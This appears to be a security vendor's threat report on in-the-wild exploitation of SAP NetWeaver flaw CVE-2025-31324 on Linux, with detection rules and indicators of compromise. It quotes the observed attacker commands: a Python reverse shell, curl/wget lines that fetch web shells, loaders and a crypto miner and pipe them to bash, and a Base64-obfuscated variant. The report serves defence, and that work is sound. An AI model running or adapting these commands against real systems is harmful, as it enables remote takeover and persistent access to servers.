Red Canary has observed activity exploiting a newly-documented unrestricted file upload vulnerability in SAP NetWeaver Visual Composer, software used to develop enterprise applications for business analysts. While other security vendors have reported widespread exploitation on Windows environments, Red Canary also directly observed exploitation of this vulnerability on Linux systems.
CVE-2025-31324 has received a critical CVSS rating of 10.0, and we encourage patching immediately.
Red Canary Co-Founder Keith McCammon broke down Red Canary’s visibility into this exploitation in the April 29 episode of Office Hours:
What is CVE-2025-31324?
This vulnerability allows for unrestricted file uploads into a SAP NetWeaver server. By exploiting this vulnerability, an adversary may upload web shells and other arbitrary content to execute on the SAP NetWeaver server. SAP released a security advisory visible to customers of their support portal with additional guidance to patch affected components.
The vulnerability affects instances of SAP with NetWeaver 7.xx installed, including the service packs for that product.
Exploitation behavior on Linux
Public exploitation details are available for this vulnerability, and we are actively monitoring sources for additional information. Red Canary’s behavior-based approach to creating analytics enables detection of post-exploitation activity regardless of the vulnerability exploited, and that approach has identified instances of SAP NetWeaver exploitation in customer environments.
In one instance of exploitation, Red Canary observed Python reverse shell code spawning from known SAP processes:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((5.161.153[.]112,8443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([/bin/sh,-i]);This command would take arbitrary commands from the host at 5.161.153[.]112 and execute then in a shell on the affected Linux system.
In other instances of exploitation, we observed the manipulation of web shell files followed by the download and execution of additional tools:
mv ../apps/sap.com/irj/servlet_jsp/irj/root/helper.jsp ../apps/sap.com/irj/servlet_jsp/irj/root/usage.jspThis command renames the helper.jsp file to usage.jsp. Presumably this helps prevent other adversaries using the helper.jsp web shell as that file name has been reported previously in posts from other vendors.
These commands downloaded files from adversary-controlled AWS S3 buckets before attempting to execute them. Additional investigation in VirusTotal revealed these S3 buckets were used to deploy KrustyLoader malware in recent weeks.
wget hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk -O /tmp/1 || curl -o /tmp/1 hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
wget hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX -O /tmp/1 || curl -o /tmp/1 hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
(curl -sk hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -sh
curl -O hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
curl -o /usr/sap/…/servlet_jsp/_default/root/forwardsap.jsp hxxps[://]devocional[.]click/download/forwardsap.jsp
curl hxxp[://]temp[.]sh/vvgtW/webhelper -o webhelp.jsp
curl hxxp[://]update.zoho-software[.]com:443/webhelper -o /usr/sap/…/servlet_jsp/irj/root/.webhelper.jsp
This command downloaded files from an adversary-controlled Cloudflare Tunnel to execute with bash. Unfortunately we could not retrieve the delivered payload for additional investigation.
(curl -sk hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js || wget --no-check-certificate -q -O - hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js) | bash -shThis command downloaded and ran Supershell malware from adversary-controlled systems in Aliyun’s cloud.
curl -O hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.shThis command downloaded script contents that an adversary later attempted to execute. If successful, the script would install XMRig cryptocurrency miner to an affected server.
curl -o /tmp/8bq.sh hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
These final commands downloaded web shells from various adversary-controlled infrastructure and wrote them to an affected SAP server for persistent access.
curl -o /usr/sap/…/servlet_jsp/_default/root/forwardsap.jsp hxxps[://]devocional[.]click/download/forwardsap.jsp
curl hxxp[://]temp[.]sh/vvgtW/webhelper -o webhelp.jsp
curl hxxp[://]update.zoho-software[.]com:443/webhelper -o /usr/sap/…/servlet_jsp/irj/root/.webhelper.jsp
In these cases, the adversary also employed Base64 encoding of the commands to evade casual observation with process monitoring tools. In these cases, the commands appeared in this form:
bash -c {echo,d2dldCBodHRwOi8vYWJvZGUtZGFzaGJvYXJkLW1lZGlhLnMzLmFwLXNvdXRoLTEuYW1hem9uYXdzLmNvbS9CQ1lWcnJIWCAtTyAvdG1wLzEgfHwgY3VybCAtbyAvdG1wLzEgaHR0cDovL2Fib2RlLWRhc2hib2FyZC1tZWRpYS5zMy5hcC1zb3V0aC0xLmFtYXpvbmF3cy5jb20vQkNZVnJySFg=}|{base64,-d}|{bash,-i}Detection opportunities
The following trio of detection opportunities are a great starting point for security teams to develop detection coverage for behaviors we have observed after exploitation of SAP NetWeaver:.
Base64-encoded commands in shell processes
This detector looks for adversaries leveraging encoded commands in Linux shell processes to download remotely hosted files.
process == (‘bash’)
&&
command_includes (‘base64, -d’)Curl downloading files in /tmp
This detection opportunity looks for adversaries leveraging curl to download files from a remote host into the /tmp folder.
process == (‘curl’)
&&
wrote/modified_executable
&&
command_includes (‘/tmp’)Python scripts establishing a socket to a remote host
This peudo-detector looks for adversaries using Python scripts to establish a socket to a remote host.
process == python
&&
command_includes (‘ -c ‘ || ‘.socket’)
&&
command_includes ('.call(‘ || '.spawn(')
Along with patching, we recommend examining SAP web server access logs for additional evidence of CVE-2025-31324 exploitation, specifically looking for evidence of unusual requests to the API endpoint /developmentserver/metadatauploader. If possible, consider disallowing access to that API endpoint from external networks. To hunt for additional evidence of web shell uploads, organizations can search for unexpected JSP files within these folders on SAP servers:
j2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\rootj2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\workj2ee\cluster\apps\sap.com\irj\servlet_jsp\irj\work\sync
Indicators
IP addresses
5.161.153[.]112
23.95.123[.]5
Domains
brandnav-cms-storage.s3.amazonaws[.]com
abode-dashboard-media.s3.ap-south-1.amazonaws[.]com
overseas-recognized-athens-oakland.trycloudflare[.]com
ocr-freespace.oss-cn-beijing.aliyuncs[.]com
devocional[.]click
update.zoho-software[.]com
URLs
hxxps[://]ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh
hxxp[://]abode-dashboard-media.s3.ap-south-1.amazonaws[.]com/BCYVrrHX
hxxp[://]brandnav-cms-storage.s3.amazonaws[.]com:80/ZGHU5tVaLk
hxxps[://]overseas-recognized-athens-oakland.trycloudflare[.]com/v2.js
hxxp[://]23.95.123[.]5:666/xmrigCCall/8bq.sh
hxxps[://]devocional[.]click/download/forwardsap.jsp
hxxp[://]temp[.]sh/vvgtW/webhelper
hxxp[://]update.zoho-software[.]com:443/webhelper
Malicious filenames
config.sh
/tmp/0
/tmp/1
.webhelper.jsp
.h.jsp
usage.jsp
usage1.jsp
helper.jsp
404_error.jsp
webhelp.jsp
forwardsap.jsp
/tmp/8bq.sh
1.sh